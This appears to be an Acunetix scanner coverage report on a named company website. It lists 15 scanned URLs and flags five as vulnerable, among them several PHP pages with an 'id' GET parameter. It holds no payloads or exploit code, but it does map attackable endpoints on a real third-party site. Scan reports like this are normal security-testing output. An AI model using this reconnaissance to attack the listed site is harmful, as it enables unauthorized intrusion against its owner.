GET /baobitruongphat.com/sitemap.php HTTP/1.1
Pragma: no-cache
Cache-Control: no-cache
Referer: http://www.asiatruongphat.com/baobitruongphat.com/intro.php
Acunetix-Aspect: enabled
Acunetix-Aspect-Password: *****
Acunetix-Aspect-Queries: filelist;aspectalerts
Host: www.asiatruongphat.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko)
Chrome/41.0.2228.0 Safari/537.21
Accept: */*

Scanned items (coverage report)


Scanned 15 URLs. Found 5 vulnerable.
URL: http://www.asiatruongphat.com/baobitruongphat.com/
No vulnerabilities have been identified for this URL
No input(s) found for this URL
URL: http://www.asiatruongphat.com/baobitruongphat.com/index.php
No vulnerabilities have been identified for this URL
1 input(s) found for this URL
Inputs
Input scheme 1
Input name    Input type
Host          HTTP Header

URL: http://www.asiatruongphat.com/baobitruongphat.com/intro.php
Vulnerabilities have been identified for this URL
1 input(s) found for this URL
Inputs
Input scheme 1
Input name    Input type
id            URL encoded GET

URL: http://www.asiatruongphat.com/baobitruongphat.com/news.php
Vulnerabilities have been identified for this URL
1 input(s) found for this URL
Inputs
Input scheme 1
Input name    Input type
id            URL encoded GET

URL: http://www.asiatruongphat.com/baobitruongphat.com/contact.php
No vulnerabilities have been identified for this URL
No input(s) found for this URL
URL: http://www.asiatruongphat.com/baobitruongphat.com/sitemap.php
Vulnerabilities have been identified for this URL
No input(s) found for this URL
URL: http://www.asiatruongphat.com/baobitruongphat.com/newview.php
Vulnerabilities have been identified for this URL
2 input(s) found for this URL
Inputs
Input scheme 1
Input name    Input type
id            URL encoded GET
mt            URL encoded GET

URL: http://www.asiatruongphat.com/baobitruongphat.com/sanpham.php
Vulnerabilities have been identified for this URL
2 input(s) found for this URL
Inputs
Input scheme 1
Input name    Input type
id            URL encoded GET

Input scheme 2
Input name    Input type
id            URL encoded GET


URL: http://www.asiatruongphat.com/baobitruongphat.com/SlideShow.swf
No vulnerabilities have been identified for this URL
No input(s) found for this URL
URL: http://www.asiatruongphat.com/baobitruongphat.com/images/
No vulnerabilities have been identified for this URL
No input(s) found for this URL
URL: http://www.asiatruongphat.com/baobitruongphat.com/truongphat.swf
No vulnerabilities have been identified for this URL
No input(s) found for this URL
URL: http://www.asiatruongphat.com/baobitruongphat.com/css/
No vulnerabilities have been identified for this URL
No input(s) found for this URL
URL: http://www.asiatruongphat.com/baobitruongphat.com/css/corpstyle.css
No vulnerabilities have been identified for this URL
No input(s) found for this URL
URL: http://www.asiatruongphat.com/baobitruongphat.com/flv.js
No vulnerabilities have been identified for this URL
No input(s) found for this URL
URL: http://www.asiatruongphat.com/baobitruongphat.com/upload/
No vulnerabilities have been identified for this URL
No input(s) found for this URL
